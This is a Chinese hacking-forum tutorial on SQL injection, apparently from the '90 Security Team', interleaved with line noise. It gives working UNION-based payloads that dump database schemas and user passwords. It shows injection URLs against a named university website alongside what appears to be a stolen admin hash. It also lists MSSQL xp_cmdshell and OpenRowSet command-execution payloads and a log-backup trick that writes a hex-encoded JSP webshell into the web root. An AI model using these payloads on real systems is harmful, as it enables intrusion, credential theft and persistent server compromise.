————————————————————————九零后安全技术小组 | 90 Security Team -- 打造90后网安精英团队 ———————————————————————————————
. V; _; h. j4 @9 A0 u \
?+ o) W4 A8 |2 Y: o, a* {. g8 Z, G' [1 n/ E0 j5 A' T* H/ m/ P, C& C
欢迎高手访问指导,欢迎新手朋友交流学习。
, i& s3 k8 K- |4 n( ]$ \
0 `" `* S, E8 q1 w 论坛: http://www.90team.net/. \. }# R- u- z9 S' ^6 ^- H
" o; z% L/ I# X2 b. q* o) K) j2 S' q$ m' h5 c
9 J& V: p; ~2 b, a3 S# }教程内容:Mysql 5+php 注入
2 ~* X5 P$ I0 f1 v
8 W d& s K) p9 s7 xand (select count(*) from mysql.user)>0/*
+ @% w; k, ?/ o) N$ n+ x
9 q* S- Y' B' `6 _; w2 d一.查看MYSQL基本信息(库名,版本,用户)$ @3 [" f5 z* e. v* M# f) Y
) {0 \1 ^1 F2 ^+ `: C
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*" ]9 W3 r, m/ d6 S& H- |- ~
1 A0 R$ h* N, i1 S1 ^. |* a
二.查数据库
& S- c0 l2 a& n8 s# }# J& s4 C5 F& |; w& M! g
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
) p8 a" s! y; ^1 Q7 @6 |limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。0 _9 |$ V- n; C' v- P
* ]0 |& Q" O7 x" S
三.暴表0 }; u8 R. c. S/ C5 Y+ g9 ]9 }
- T2 B' a) U) X* S( }, q2 S; H0 xand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
' M( c! Q6 N* B' K- B* }! T- _" E1 w$ J; O) v8 O( U
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。2 h$ S0 F3 D+ p8 j+ L' m
. i. ?) Y: E1 J, S四.暴字段
* X/ H0 W) H1 N- G" F9 U8 y
* l3 j6 Z2 O* E5 }: [8 f1 K" ?0 Mand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8 from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
- b+ V, D" r, r8 i% `9 F3 l0 J$ N9 G3 Y% p
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
; b3 u; L+ i9 _+ E" I, E
/ e* T; u$ e( t五.暴数据
: _/ H! o# |+ c( ~
) O z7 |! s& _and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
4 R6 f5 r( x* F& Z n8 j9 t; ]
; @4 [' J* a9 W& w6 T
( P3 y, C& F3 C1 p. X! }2 b这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。6 F" s, E! _! @1 L6 J
8 _2 b7 j B& L% c0 P9 X
: ~: ^- b5 ]+ |. o$ K 新手不明白的可以到论坛发帖提问,我会的尽量给你解答。
. x7 ^0 _# V. a8 Q- t' l; B( g* p% q
+ j3 c0 l% D8 f4 P: M6 b/ c 欢迎九零后的新手高手朋友加入我们
4 a" ^7 Y% V% N: h7 Q# r$ c8 F/ g; ^' x" y/ F
By 【90.S.T】书生
9 e- ?: }! n* i3 n
7 x8 M1 v8 j# }& m1 I4 \) x, Z MSN/QQ:it7@9.cn
( C; X) Y* F2 X" `- n
) y1 ~! J ]$ { z 论坛:www.90team.net & V: C# m2 N% h) W
6 Y% F, X" J8 Z6 Z( S- k$ T
2 k/ x k% c) u6 t' F6 ^- F% g1 A& y! E% D( F
1 a# Z. w; K4 y0 Y! ~- _
3 `" }0 {3 J' v7 H2 `" x- s' B
) C$ C% i& o) {& k5 h& T' }
: H9 r; V" }# ~5 R1 m
- _( Y T, {' @. _. e
6 e2 h4 j4 p" H9 ?" |5 N- U- A. H
" t( f1 J" G- J0 r" c" g7 t
6 Q% e/ c0 n) q8 i! q
http://news.cupl.edu.cn/V/videoshow.php?id=-95 UNION SELECT 1,2,loginame ,4,5,6,7,8,9 from --
) }8 E* R" s Q+ ^password loginame ( l+ x5 O$ U7 _- h. d
& p4 c! R! \2 G |7 ~
% h. J! n( d4 U v/ T6 r* N! B
; z# `: z; H6 @* R3 Z% }/ J
! a* @% H W& R
http://news.cupl.edu.cn/V/videoshow.php?id=-95 UNION SELECT 1,2,TABLE_NAME,4,5,6,7,8,9 rom information_schema.TABLES where TABLE_SCHEMA =CHAR(99, 45, 110, 101, 119, 115) limit 0,1--
, t# Q! Y; x" ^2 @8 a+ d. Q& _" W8 l) h" X' P8 i3 @
+ o& Y! V- v+ X& Q9 b& @
7 @* w; K. A4 m: f. g8 s7 e# i
# a d8 J! K5 r2 f$ o8 i0 q0 H1 h- k
6 x/ v- m A" A+ D9 O" q; t
" c6 Y8 \! m' J4 H7 J E r; Y2 o. H: l/ d* h6 O& ~4 c
( h$ z3 N4 A9 s2 m% r, u
$ J. _% H/ {" z
administer; H% {$ V7 C3 j0 l d0 w
电视台
" c: a" @1 o2 ?fafda06a1e73d8db0809ca19f106c300 $ K9 f& ^' N+ X- t
a g: v, A: J$ m$ o2 `$ Q K$ O+ M" P% I
) V4 \1 z. k* T8 n
4 @( |- q4 D h& I& q
3 d0 p) W3 R; V! ?
5 X4 Q$ J8 }. h1 E e6 G0 f0 J' S6 O# F% W* \7 J2 i
# W3 S# D7 i( g
) J* _6 f# g" b, C4 R4 N3 |+ c6 U0 x/ d
IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm. U; r/ l: Q! P
* ? }9 J0 |: F* L( t* G" t
1 R- I3 ?6 Q/ Q# F2 t Q! J读取IIS配置信息获取web路径
* w- U0 V- K2 Q7 q
/ n+ D( F& A7 D7 C/ H6 L0 jexec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--# { K/ m! T6 M4 R! a0 f
3 W) C( w- d2 N
执行命令exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
( U& [4 l8 A+ ]: M6 U* F- D. N; K" J- u$ O: b* G, T: z
+ M. d( N& A( }) `3 M$ p. Y
CMD下读取终端端口
- t) O* t1 D3 P. P6 N( S* _" }$ g: }regedit /e c:\\tsport.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"% w4 r: `& O* t/ ^
0 z B4 w! U( Y5 G, t2 s
然后 type c:\\tsport.reg | find "PortNumber"
3 S' [$ v; k5 a% ~9 @9 O* l3 V4 M
. F! f* t$ _! t9 @, c5 C
+ X& ]" f6 F* b3 N2 i+ K3 v- B# [( C4 @" p
3 n' I8 x3 `, k% i. G* t5 d5 f; U. }& g2 d' B
;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
) V# Y, K! K# w v- o4 c$ B
7 b" k5 o% r' F( l. H;declare @s varchar(4000) set @s=cast(0x53656C656374202A2046726F6D204F70656E526F7753657428274D6963726F736F66742E4A65742E4F4C4544422E342E30272C20273B44617461626173653D6961735C6961732E6D6462272C202773656C656374207368656C6C2822636D642E657865202F63206563686F2057656C636F6D6520746F20392E302E732E74202020207777772E39307465616D2E6E65742020627920483478307872207869616F6A756E2020203E20433A5C57696E646F77735C48656C705C69697348656C705C636F6D6D6F6E5C343034622E68746D22292729 as varchar(4000));exec(@s);-- and 1=1
/ [5 y5 R' g) f( [1 V3 s3 T6 ?& `+ e8 U( D" ^7 s$ }& C
8 d2 b: N& r$ QSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0', ';Database=ias\ias.mdb', 'select shell("cmd.exe /c echo Welcome to 9.0.s.t www.90team.net > C:\Windows\Help\iisHelp\common\404b.htm")')/ ~! G7 r9 y9 ~5 b
5 C6 C+ ~- t) X# {, O
. D5 D* C! z3 f D+ Z0 }- M. ^& x! k
jsp一句话木马
\3 Z. S- U) h
m1 R" i6 t( n, z: g/ ]" @* u: R- N
: o3 V6 q" M, H/ q1 T. l& _/ m# g9 g! O
; N& a1 P4 T2 |" P■基于日志差异备份6 s" O$ k' r$ V S
--1. 进行初始备份/ K1 T5 d: B, I& T/ C$ B: X D
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
0 N! M0 g, S% G" K7 \2 I0 [6 l8 v' F% T+ C8 Y+ E& p
--2. 插入数据
( G1 a3 V6 m4 b, G$ ?1 h9 M) t# c;Insert Into ttt Values(0x3C25DA696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C5C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293BDA253EDA)--2 n Z6 v8 A1 I8 Q
+ u) _7 b2 U& o# R+ b
--3. 备份并获得文件,删除临时表
$ Z4 I- [+ I( C0 P;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--* t- d3 f: W' X
fafda06a1e73d8db0809ca19f106c300
( W( R8 r9 L8 l3 d1 R( ^/ t( cfafda06a1e73d8db0809ca19f106c300# f+ D) [$ I! C% w9 z$ Z7 ]+ _
4 L+ k& m5 e6 W% W |